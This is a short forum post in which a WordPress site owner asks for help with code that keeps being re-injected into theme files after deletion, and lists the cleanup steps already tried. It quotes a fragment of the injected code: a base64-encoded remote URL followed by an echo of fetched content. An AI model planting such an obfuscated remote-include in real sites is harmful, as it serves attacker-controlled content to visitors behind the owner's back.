I have been dealing with this for the past three weeks. I have read over 100 articles on how to fix this and still can't figure anything out. I keep finding the following code in one of the following: header.php, index.php, and footer.php. I delete it but it always comes back. I have checked my files for the typical malicious files such as the bad image files, "wordpress" username, additional plugins in mysql database, etc. I can't find anything. Any help would be greatly appreciated. Below is the code that keep getting injected. I have also changed all passwords such as server, ftp, wordpress, mysql, etc. There is a very good chance that I picked this up when I was still on WordPress 2.3.3.
$str1 = 'aHR0cDovL2NkdC5vcmcvc2VhcmNoL3NlYXJjaGRhdGEvdGVtcGxhdGVzL3N0eWxlLmh0bQ==';
echo $content; ?>
Thank you for your help.